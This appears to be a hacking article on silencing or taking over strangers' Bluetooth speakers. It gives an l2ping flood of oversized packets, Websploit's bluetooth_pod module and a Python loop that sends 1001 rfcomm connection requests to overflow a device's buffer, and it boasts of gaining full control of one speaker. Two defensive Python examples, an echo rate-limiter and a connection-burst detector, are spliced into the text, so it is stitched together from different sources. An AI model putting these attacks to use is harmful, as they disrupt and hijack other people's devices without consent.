
Gangs of teenagers with portable Bluetooth speakers playing loud music drive me nuts. Today, I will explain how to neutralize this ‘natural disaster’ without (OK, almost without) committing a criminal offense.
Modern Wi-Fi routers can filter out unwanted packets, but the majority of Bluetooth adapters are dumb, to say the least. They care neither what packets you send nor how large or how numerous they are. Therefore, you can increase the size of a ping packet in Linux to a tremendous value and then send 1000 such packets to a Bluetooth device.
First, you have to find a suitable device within the range using the command
$ hcitool scan
The command displays the list of available Bluetooth devices and their MAC addresses. If your system cannot see a Bluetooth adapter, try installing a Bluetooth manager for Linux. For instance, in Kali, I use gnome-bluetooth installed by the command:
$ apt-get install gnome-bluetooth
Alternatively, you can use the blueman utility:
$ apt-get install blueman
After getting the list of potential victims, attack them using one of the methods below:
Method 1. l2ping
Enter the command:
$ l2ping -i hci0 -s -f
It will generate packets with the size specified by the
parameter and send them to the MAC address specified by the
parameter. As a result, you will see the response time in the terminal grow steadily, and the Bluetooth function on the attacked device stops working. After a while, it will turn on again – but the annoying loud music will be off for some time, bringing you malicious satisfaction.

INFO
The above scheme works fine if the attacked device (e.g. a smartphone) is connected to headphones or a speaker via Bluetooth. After the attack, the two devices won’t be able to reconnect with each other.
Method 2. Websploit
There is also a more elegant way to silence a speaker producing rap sounds. Launch the Websploit utility:
$ websploit
Enter the following command in the console:
$ show modules
It will display all modules compatible with this utility; there are plenty of Wi-Fi components, but you need the bluetooth/bluetooth_pod module.
$ use bluetooth/bluetooth_pod
Now you have to set up the parameters and specify the attacked device:
$ show options
$ set bdaddr
To make sure that Bluetooth is killed, change the size of the outgoing packet:
$ set size 999
Time to launch the ‘silence machine’:
$ run
The resultant picture is the same: the ping duration increases, and the music stops. Terrific!
The above two methods are effective against nearly all Bluetooth speakers, headphones, and other similar devices. This is because their manufacturers are too lazy to release firmware updates enabling the filtering of incoming packets. Therefore, if you have a Linux laptop, you can silence any speaker within its range.
If the speaker withstands the attack, you may try sending packets to the phone connected to it. I tested this method on a powerful JBL Xtreme speaker, and it withstood the load. But cheap made-in-China devices are effectively silenced by this attack.
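What the "filtering of incoming packets" mentioned above could look like on the receiving side, as an added example that is not from the original article or from any vendor's firmware: a per-peer token bucket with a payload cap in front of the echo responder, replayed over a constructed trace. The limits, peer names and trace are assumptions.

```python
from dataclasses import dataclass, field

# All limits below are assumptions chosen for illustration, not values from the article.
MAX_ECHO_PAYLOAD = 48    # bytes; larger echo requests are dropped outright
CAPACITY = 5000          # bucket size in milli-tokens (burst of 5 requests)
COST = 1000              # milli-tokens spent per admitted request
REFILL_PER_MS = 1        # milli-tokens regained per millisecond (1 request/s sustained)


@dataclass
class EchoFilter:
    """Per-peer token bucket placed in front of the echo responder."""
    buckets: dict = field(default_factory=dict)   # peer -> (tokens, last_seen_ms)

    def admit(self, peer: str, payload_len: int, now_ms: int) -> bool:
        if payload_len > MAX_ECHO_PAYLOAD:
            return False                          # oversized: never answered, costs nothing
        tokens, last = self.buckets.get(peer, (CAPACITY, now_ms))
        tokens = min(CAPACITY, tokens + (now_ms - last) * REFILL_PER_MS)
        ok = tokens >= COST
        self.buckets[peer] = (tokens - COST if ok else tokens, now_ms)
        return ok


def replay(trace):
    """Run (time_ms, peer, payload_len) tuples through the filter; count admitted per peer."""
    flt, admitted = EchoFilter(), {}
    for now_ms, peer, size in sorted(trace):
        admitted.setdefault(peer, 0)
        if flt.admit(peer, size, now_ms):
            admitted[peer] += 1
    return admitted


# Constructed trace: two flooding peers and one well-behaved peer.
BIG_FLOOD = [(t * 10, "peer-big", 600) for t in range(1000)]     # 1000 oversized requests
SMALL_FLOOD = [(t * 10, "peer-small", 44) for t in range(1000)]  # 1000 small, 10 ms apart
NORMAL = [(t * 2000, "peer-ok", 44) for t in range(5)]           # one every 2 s
TRACE = BIG_FLOOD + SMALL_FLOOD + NORMAL

if __name__ == "__main__":
    print(replay(TRACE))
```

Integer milliseconds and milli-tokens keep the bucket arithmetic exact, so the same trace always yields the same counts.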
Ready-to-use jammers
Online stores offer exciting devices, including jammers operating at certain frequencies. Such gadgets may cost good money and offer various capabilities. Some of them kill all mobile signals, including Wi-Fi and Bluetooth, at once, while others cannot even jam H+.
If you really need such a device, I strongly recommend researching the respective articles in the national legislation prior to purchasing it. In some countries, you have to register your jammer with the authorities; failure to do so results in administrative or criminal liability.
Connecting to another device
As discussed above, simple speakers and headphones almost never filter out the received packets. But what if you send to such a device not just a ping packet, but a packet containing a connection request? Or many such packets?
Not all manufacturers take precautions against the buffer overflow error. What happens if the received packets are lined up, and no space is left to store new requests? In such a situation, the speaker would try to execute the command and concurrently clear the buffer.
Therefore, use the standard Bluetooth communication protocol, rfcomm. Too bad, the utility controlling this protocol doesn’t allow you to send a thousand such requests. So, I am going to write a short Python script automating the process.
#!/usr/bin/env python
import subprocess

cmd = ['rfcomm', 'connect', '', '1']
for i in range(0, 1001):
    subprocess.call(cmd)
    print('Connecting...')
Before running the script, you have to find out the MAC address of the device. Use the above mentioned hcitool scan
command and insert the retrieved address into the script instead of the
. Save the script and execute it:
$ python
The success or failure of the script execution will depend on the model of the attacked device (to be specific, on the time required to fill its buffer). If the buffer becomes full prior to the flushing, the command will be executed, and you connect to the speaker simultaneously with its legitimate user. However, if the buffer is flushed first, you will have to run the script again.
After the successful execution of the script, you can throw your own disco party or disable the device. My experiments with JBL Xtreme resulted in its shutdown, while JBL Flip 2 has passed under my full control.
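Seen from the receiving side, a loop of repeated connection attempts like the one described above stands out in a connection log. The detector below is an added example, not part of the original article: it counts connection attempts per peer in a sliding window and applies a stricter limit to peers that are not bonded. The log format, event names, thresholds and addresses are constructed assumptions.

```python
from collections import defaultdict, deque

# Thresholds are assumptions for illustration; tune them to the device being monitored.
WINDOW_MS = 10_000        # sliding window length
LIMIT_BONDED = 20         # attempts tolerated per window from a bonded (paired) peer
LIMIT_UNBONDED = 5        # attempts tolerated per window from an unknown peer


def detect_connect_bursts(lines, bonded):
    """Return {peer: summary} for peers whose connection attempts exceed the limit.

    Each line uses a constructed format: "<time_ms> <peer_addr> <event>".
    """
    window = defaultdict(deque)       # peer -> timestamps inside the current window
    stats = defaultdict(lambda: {"attempts": 0, "peak": 0, "first_alert_ms": None})
    for line in lines:
        ts, peer, event = line.split()
        if event != "CONNECT_REQ":
            continue
        ts = int(ts)
        q = window[peer]
        q.append(ts)
        while ts - q[0] > WINDOW_MS:  # drop attempts that fell out of the window
            q.popleft()
        s = stats[peer]
        s["attempts"] += 1
        s["peak"] = max(s["peak"], len(q))
        limit = LIMIT_BONDED if peer in bonded else LIMIT_UNBONDED
        if len(q) > limit and s["first_alert_ms"] is None:
            s["first_alert_ms"] = ts
    return {p: s for p, s in stats.items() if s["first_alert_ms"] is not None}


# Constructed sample log: an unknown peer retrying every 200 ms, 1001 times in all,
# plus the owner's phone reconnecting three times.
UNKNOWN, OWNER = "02:00:00:00:00:AA", "02:00:00:00:00:01"   # made-up addresses
LOG = [f"{i * 200} {UNKNOWN} CONNECT_REQ" for i in range(1001)]
LOG += [f"{t} {OWNER} CONNECT_REQ" for t in (5_000, 65_000, 125_000)]
LOG += [f"70000 {OWNER} DISCONNECT"]
LOG.sort(key=lambda entry: int(entry.split()[0]))

if __name__ == "__main__":
    print(detect_connect_bursts(LOG, bonded={OWNER}))
```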
Let the silence be with you! Good luck!
